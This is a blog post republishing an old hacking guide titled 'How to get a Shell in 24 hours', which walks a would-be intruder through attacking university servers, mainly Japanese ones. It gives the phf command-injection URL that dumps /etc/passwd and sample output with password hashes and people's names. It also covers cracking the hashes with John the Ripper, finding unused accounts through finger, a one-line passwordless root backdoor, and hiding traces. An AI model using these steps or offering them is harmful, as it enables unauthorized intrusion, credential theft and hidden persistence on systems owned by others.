Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.

Monday, May 31, 2010

Browse » Home » , , , , , » How to get a Shell in 24 hours

How to get a Shell in 24 hours

 http://blogs.msdn.com/blogfiles/powershell/WindowsLiveWriter/GetPowerShell_86F4/get-PowerShell.png


I have read many a hacking e-zines, and 'how to hack' documents before. They are ok, interesting etc.  but they always show you how to get root through a shell, what people seem to forget is the fact that you have to actually get the password before you can use a shell to an account. You might be lucky and find that l:guest p:guest will work. In this text I will show you how easy hacking is ( on old deformed systems ) and how you can get a shell of some sort in 24 hours after reading this. I am not going to go on to explain how to get root after getting a shell as there are 1000's of texts and C programs which explain this.
OK, the very first thing you need to do is to have a WWW browser, a telnet program, john the ripper kracker program ( i recommend ) and a good dictionary file.

WWW Browser - Netrape or MSIE are fine
Telnet Program - One which lets you set which port you want to connect to
John The Ripper - Will be at http://www.sinnerz.com/darkfool
Dictionary File - Found at many hacking web sites. Do a search for one
Ok, every net user/wanna be hacker will have most of those programs and if ya don't there really easy to get a hold of.
OK, now I am going to tell you something about Japan. They make your stero, they made the bits inside your computer, they made your car, they made everything electronic around you, you have their eyes at the end of your nob, but they are rubbish at one thing, the internet and security. The honestly don't know anything about internet security, I have rooted or got shells on many a japanese servers. These are my favourite systems to attack because they are soooooo easy. I am also told that Australian servers are very easy too, some Berkeley UNiversity machines are very easy to krack too.
Next thing you got to do is fire up your WWW browser. Goto AltaVista http://www.alta-vista.digital.com if you don't know already this is a search engine which has some very nice advance features.
Once here in the search field box type this  url:ac.jp and press search, this looks for all URL's with ac.jp in.  This is academic places in Japan, similar to the US which has .edu instead. You will be presented with a load
of web pages which text you probably can't read because its all in some funny language. More importantly is the URL which they point out, for example, www.mo.cs.rekimoko.ac.jp    , notice the ac.jp at the end of it.
Click on the link to the site ( longer server urls are easier to break into BTW ). When the URL appears on the WWW browser box at the top of the screen add this line to the end of it.
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
or
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
i.e
http://www.mo.cs.rekimoko.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
To all you 313375 out there, yes, i know this is the phf technique and it is virtually dead, but you'll be surpised where you can use this.
This technique of finding the password file to the system is old, it was first used in November 1996 on the FBI web page by a few hackers. It has been patched up by a lot of servers, so this won't work on www.nasa.gov or
most of www.*.com  but still works on many University servers outside of EU and US.
Ok, once the URL has been entered you will see a number or things :-
Error 404
/cgi-bin/phf is not found on this server
 
OR
WARNING
You do not have permission to view /cgi-bin/phf/ on this server There are a number of other things the server might say, but the thing you want it to say is the following :-
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr.YmO.:1012:10:Hisaharu
TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
maemae:dvUMqNmeeENFs:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
watanaby:ewF90K0gwXVD6:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
kake:kFph8HEM/aaAA:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
 
etc.......
This means you have hit the jackpot !
If you get something similar to this but all lines have something similar to the following :-
root:*:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu  TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
maemae:*:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
watanaby:*:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
kake:*:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
 
( notice the * )  if you don't know already this means its shadowed and you cannot work out the password using a shadowed file.
If some but not all of the logins have * in them its ok, its worthwhile getting the ones which aren't shadowed, hey, a shell is a shell !
Get all the lines which aren't shadowed and then paste them into notepad, write the name of the server in the top line of the file and save it.
Ok now for the next bit, this is fairly simple but can be a lengthy process depending upon which speed machine you have and how big your password file is and dictionary file. Use john the ripper or whatever password cracker you are using, although i recommend john the ripper because its quick. This will probably take a long time so go to the pub or have a drive or something.......
If you are lucky enough to work out the passwords to the logins then well done, if you don't, them find another server or increase the size of your dictionary file, make it as big as you can, the bigger the better, the more luck you will have in finding the password.
OK, you got some passwords to a few logins, if you got root them jump around the room with joy ( I do ). If you didn't then, well, atleast you got yourself some shells. Now, if you want to keep these shells without anyone knowing then your best bet is to telnet to the site at port 79, you will have a blank prompt, here type in the username of the account you cracked, it will tell you the last time they logged in, do this for all the accounts, use the account which isn't used very much, the best ones are the ones which say ' User Never Logged On ' because then the account is basically yours !
{ Note: If you get root type the following at the shell prompt :-
echo "myserver::0:0:Test User:/:/bin/csh" >> \etc\passwd
This wil allow you to login to the server with l:myserver so you don't get admin suspicous when they see people login in as root. } 
Hide yourself as much as possible, if you already have a shell then go through that first when logging on, or, telnet to the hacked shell and then re-telnet to the hacked shell using the hacked shell, if you see what I mean, so your who appears as localhost. Get some C scripts which delete your presence etc...
Thats it, if there's demand to explain this in further detail then please e-mail me telling me you want a follow up, I don't do personal help so don't e-mail me asking for help PLEASE DON'T !
Thats it.....
" Stay cool and be somebodys darkfool this year "
You can leave a response, or trackback from your own site.

About 'Anu': My name is 'Anu' also Known as 'ANU 007 TIGER' .I'm administrator of 'PC Tips by Anu' blog .This blog was opened for sharing contents about hacking n cracking.
Thanks YAHOO OR GMAIL

0 comments:

Post a Comment

 
Back to Top